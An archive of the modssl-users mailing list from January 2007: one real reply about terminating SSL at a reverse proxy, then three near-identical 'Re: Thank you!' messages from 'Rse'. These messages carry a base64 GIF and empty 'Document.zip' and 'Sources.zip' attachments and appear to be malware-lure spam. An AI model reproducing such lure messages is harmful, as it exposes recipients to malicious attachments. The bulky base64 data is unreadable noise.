Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I typically use a SSL-terminating reverse proxy in the DMZ, like Pound,
to terminate the SSL connection at the front door and send the request
back into a private subnet over plain HTTP for IDS/IPS detection,
clicktracking, etc.

Best~
- -dsp

Nikhil Kadu wrote:
> Hi Guys,
> 
> Is it possible to decrypt the encrypted data in an HTTPS request/response while sitting in the Apache Proxy? Which functions of MOD_SSL and MOD_PROXY modules need to be tweaked to achieve this? Please let me know if somebody has done some related work.
> 
> Best regards,
> Nikhil Kadu
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFFsOIOKmNPF3QynfQRAsGbAKCILyuzshFEcS2Kxec1Vqwx3BRPDgCfUWQ+
V+K12TOX32Jzmn2MszWgu2s=
=22Uk
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 20 15:09:27 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ECBD514D867; Sat, 20 Jan 2007 15:09:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 5822514D82B
	for ; Sat, 20 Jan 2007 15:09:25 +0100 (CET)
Date: Sat, 20 Jan 2007 09:21:05 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 20 16:08:15 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EECC114D867; Sat, 20 Jan 2007 16:08:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 52DB314D82B
	for ; Sat, 20 Jan 2007 16:08:14 +0100 (CET)
Date: Sat, 20 Jan 2007 10:19:53 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jan 21 23:33:28 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CC47814D870; Sun, 21 Jan 2007 23:33:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 1ABF614D84D
	for ; Sun, 21 Jan 2007 23:33:27 +0100 (CET)
Date: Sun, 21 Jan 2007 17:45:06 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
